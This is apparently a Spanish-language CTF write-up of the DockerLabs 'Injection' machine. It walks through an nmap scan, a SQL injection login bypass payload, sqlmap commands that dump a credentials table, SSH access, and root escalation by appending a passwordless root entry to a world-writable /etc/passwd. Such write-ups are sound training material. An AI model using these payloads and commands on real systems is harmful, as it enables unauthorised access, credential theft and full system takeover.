~/home
Volver a Writeups
dockerlabs medio Windows

Injection

15 Apr 2026
#sqli #sql-injection #passwd #privesc

Reconocimiento

nmap -sV -sC -p- --min-rate 5000 172.17.0.2

Puerto 80 abierto con formulario de login.

SQL Injection

Login bypass básico:

usuario: admin' or '1'='1
password: cualquier cosa

Acceso obtenido. Enumeramos la base de datos con SQLMap:

sqlmap -u "http://172.17.0.2/login.php" --data="user=admin&pass=test" --dbs
sqlmap -u "http://172.17.0.2/login.php" --data="user=admin&pass=test" -D users --tables
sqlmap -u "http://172.17.0.2/login.php" --data="user=admin&pass=test" -D users -T creds --dump

Credenciales extraídas: dylan:KJSDFG789FGSDF74.

Acceso SSH

ssh dylan@172.17.0.2

Escalada de Privilegios

ls -la /etc/passwd
# -rw-rw-rw- 1 root root ... /etc/passwd

El fichero /etc/passwd tiene permisos de escritura para todos. Añadimos usuario root:

echo 'pwned::0:0:root:/root:/bin/bash' >> /etc/passwd
su pwned

root@injection:/# cat /root/root.txt